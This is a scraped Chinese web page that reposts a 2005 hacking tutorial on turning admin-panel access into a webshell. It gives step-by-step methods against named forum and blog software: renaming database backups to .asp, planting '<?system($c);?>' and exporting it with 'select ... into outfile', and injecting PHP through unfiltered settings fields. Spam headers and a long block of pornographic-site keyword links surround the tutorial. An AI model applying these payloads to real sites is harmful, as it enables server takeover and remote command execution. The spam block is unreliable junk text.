国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

從后臺到webshell的一點思路
2005-12-17   

   1.asp+acc/mssql程序

主要是利用后臺對access數據庫的"備份數據庫"或"恢復數據庫"功能,"備份的數據庫路徑"等變量沒有過濾導致可以把任意文件后綴改為asp,從而得到webshell,msssql版的程序就直接應用了access版的代碼,導致sql版照樣可以利用。具體方法和分析可以參考angel的文章《動網論壇7.0獲得webshell的分析》。據我所知,目前還有很多的asp程序后臺存在這樣的漏洞,利用方法大同小異。
2.php+mysql程序
①.利用后臺的數據查詢功能
在有的程序后臺提供直接對mysql數據查詢功能,我們就可以利用它執行select ... into outfile查詢輸出php文件,因為所有的數據是存放在mysql里的,所以我們可以通過正常手段把我們的webshell代碼插入mysql在利用select ... into outfile語句導出shell。我們這里用ipb論壇做個演示:
第一步:把我們的webshell代碼寫入數據庫
隨便找個可以寫入的地方(注意對你輸入的要沒有進行過濾),這里我們就用后臺的新建立個論壇,在論壇描敘里寫入我們的shell代碼<?system($c);?> 提交 ok這樣就把我們的shell寫入了數據庫了。
第二步:導出webshell
我們來到"sql management"里的"mysql toolbox"在"run query"里寫入語句:
select * from 123forums into outfile 'd:\shell.php'
^                 ^
shell代碼所在的表       web目錄絕對路徑
如果主機mysql查詢成功,我們就得到我們webshell:
http://127.0.0.1/test/shell.php?c=dir
②.利用mysql數據備用
思路 結合上面的2種情況,有的程序在備用數據庫時 對備用文件的類型沒有限制,從而導出php文件,我們和①中那樣,通過把webshell代碼寫入數據庫中,在利用數據備用導出webshell,我們大家熟悉的vbb論壇就可以用這個方法來得到webshell:
我們設置用戶的簽名為<?system($c);?> 然后到后臺的數據庫備份,在"在服務器上備份數據庫到文件"里改為shell.php ,提交保存。我們就可以在論壇的根目錄下訪問我們的shell了,因為可能到處的文件比較大,我們可以換一個可以生成文件的webshell代碼。
從后臺到webshell的一點思路--補充篇
文/superhei
思路:
利用web后臺系統設置,如果是系統設置是保存在php/asp文件了,我們可以同過在設置里寫入webshell代碼到保存設置的php/asp文件了.
演示:
程序sablog,sablog的基本設置保存在admin\settings.php 由于后臺在提交設置的變量十沒有過濾,導致我們可以向admin\settings.php寫入任意代碼。
進入后臺--"基本設置"--"blog名稱"(其他項也可以)--填入代碼:sss";phpinfo();"ss --提交。
這樣我們就把phpinfo()寫入了admin\settings.php,我們可以看到admin\settings.php正常顯示php的信息。
小結:
上面是php等系統的演示,同樣也適合asp等其他的系統(比如動力,驚云下載等等)。只是注意在寫代碼的時候要小心,如果代碼有錯,可能導致整個web系統的癱瘓。
還有一個是利用上傳漏洞的 這個就不要多說了 呵呵:)。

熱詞搜索:

上一篇:標準SQL注入入侵語句
下一篇:PHP+MySQL注入導出文件的新發現-附帶IPB2的漏洞利用

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
欧美中文字幕一区二区三区亚洲| 日韩午夜电影在线观看| 国产一区二区三区综合| 麻豆精品一区二区av白丝在线| 亚洲国产视频在线| 丝袜美腿高跟呻吟高潮一区| 天天色图综合网| 国产成人精品1024| 99精品国产一区二区三区不卡| 在线欧美日韩精品| 欧美电影免费观看高清完整版在线| 国产日韩欧美麻豆| 一区二区三区在线观看网站| 日韩不卡在线观看日韩不卡视频| 国产一区二区三区精品欧美日韩一区二区三区 | 26uuu精品一区二区在线观看| 欧美tk丨vk视频| 亚洲第四色夜色| 国内精品免费**视频| 91久久香蕉国产日韩欧美9色| 精品成a人在线观看| 亚洲在线视频免费观看| av在线不卡观看免费观看| 日韩视频在线观看一区二区| 亚洲制服丝袜一区| 日本精品一区二区三区四区的功能| 日韩精品在线一区二区| 免费在线成人网| 日韩欧美的一区| 国产裸体歌舞团一区二区| 欧美不卡一区二区| 韩国理伦片一区二区三区在线播放| 欧美一区二区三区在线观看| 亚洲成va人在线观看| 欧美性大战久久久| 日韩精品福利网| 欧美片在线播放| 麻豆91精品视频| 久久视频一区二区| 成人激情av网| 亚洲激情五月婷婷| 在线视频一区二区三| 日日夜夜一区二区| 久久久无码精品亚洲日韩按摩| 国产成人啪免费观看软件| 欧美激情一区二区三区在线| bt欧美亚洲午夜电影天堂| 亚洲一区免费视频| 精品捆绑美女sm三区| 在线观看欧美日本| 麻豆精品久久久| 亚洲一区二区三区视频在线| 日韩美女在线视频| 色8久久精品久久久久久蜜| 亚洲va欧美va国产va天堂影院| 国产日韩视频一区二区三区| 欧美日韩久久久久久| 99久久久国产精品| 国产乱妇无码大片在线观看| 日韩高清欧美激情| 一区二区日韩av| 亚洲最新视频在线观看| 91精品国产福利在线观看| 26uuu国产在线精品一区二区| aaa亚洲精品| 国产91在线看| 欧美日韩一区二区三区视频| 欧美精品日韩一区| 亚洲日穴在线视频| 麻豆国产欧美一区二区三区| 91影视在线播放| 精品国产免费人成电影在线观看四季| 久久久久一区二区三区四区| 亚洲国产成人porn| 不卡av免费在线观看| 久久婷婷久久一区二区三区| 一区二区三区不卡在线观看 | 日韩视频免费直播| 国产女主播在线一区二区| 亚洲成人免费电影| 99热这里都是精品| 中文久久乱码一区二区| 极品少妇一区二区| 精品国产伦一区二区三区免费| 亚洲午夜精品网| 在线观看免费成人| 亚洲成av人在线观看| 欧美性xxxxxxxx| 一区二区三区四区激情 | 国产99精品国产| 久久久久国产成人精品亚洲午夜| 亚洲成人www| 欧美一区二区三区四区视频| 亚洲精品国产a| 一本一道久久a久久精品 | 9191国产精品| 亚洲精品国产精华液| 不卡的av电影| 国产欧美日产一区| 国产呦萝稀缺另类资源| 日韩欧美久久久| 日本亚洲欧美天堂免费| 91小视频在线| 亚洲午夜免费福利视频| 色综合久久88色综合天天6| 久久精品亚洲乱码伦伦中文| 久久99久久久欧美国产| 日韩欧美一区二区视频| 久久精品国产秦先生| 欧美成人性战久久| 91污片在线观看| 亚洲欧洲国产日本综合| 色又黄又爽网站www久久| 亚洲激情校园春色| 欧美精品视频www在线观看| 天天综合天天综合色| 日韩精品综合一本久道在线视频| 国产一区二区三区免费观看| 中文字幕视频一区| 91亚洲午夜精品久久久久久| 一级精品视频在线观看宜春院| 欧美日韩卡一卡二| 成人国产精品免费网站| 午夜欧美2019年伦理| 国产视频一区在线观看| 欧美精品视频www在线观看| 狠狠色狠狠色综合系列| 午夜一区二区三区视频| 欧美国产精品一区二区三区| 在线观看一区日韩| 不卡的av电影| 国产精品资源在线观看| 久久国产精品99精品国产| 一级做a爱片久久| 日日夜夜免费精品视频| 日韩高清一区在线| 成人污视频在线观看| 欧美日韩国产不卡| 国产精品久久久久久福利一牛影视 | 精品污污网站免费看| 成人免费高清在线| 高清视频一区二区| 国产999精品久久久久久| 色先锋久久av资源部| 正在播放一区二区| 26uuu国产日韩综合| 精品国一区二区三区| 久久久亚洲精华液精华液精华液| 国产亚洲精品久| 亚洲精品第一国产综合野| 亚洲男同性视频| 美国毛片一区二区三区| 99久久精品国产导航| 日本乱人伦一区| 日本乱码高清不卡字幕| 国产精品三级在线观看| 奇米色777欧美一区二区| 欧美喷潮久久久xxxxx| 717成人午夜免费福利电影| 最新高清无码专区| 国产毛片精品国产一区二区三区| 欧美日韩一区不卡| 亚洲男人电影天堂| 一本到高清视频免费精品| 中文字幕在线一区| 成人福利视频网站| 亚洲视频一区二区在线观看| 99麻豆久久久国产精品免费| 国产日韩亚洲欧美综合| 最好看的中文字幕久久| 制服丝袜成人动漫| 91福利在线看| 亚洲欧洲日韩一区二区三区| 国产亚洲精品超碰| 国产精品日韩精品欧美在线| 国产精品嫩草影院com| 欧美激情综合在线| 夜夜揉揉日日人人青青一国产精品| 久久久久成人黄色影片| 国产午夜精品久久久久久久 | 色综合天天综合色综合av | 日韩欧美色电影| 日韩一卡二卡三卡四卡| 国产精品久久精品日日| 亚洲成人资源网| 精品一区二区三区在线观看国产| 激情综合色综合久久综合| 国产另类ts人妖一区二区| 不卡高清视频专区| 欧美高清视频一二三区 | 亚洲一区二区三区激情| 一区二区三区在线观看网站| 久久国产精品免费| 日韩欧美高清dvd碟片| 亚洲国产中文字幕| 久久久久国产免费免费| 久草精品在线观看| 欧美性猛交xxxx乱大交退制版 | 欧美一区二区精品| 久久久精品人体av艺术|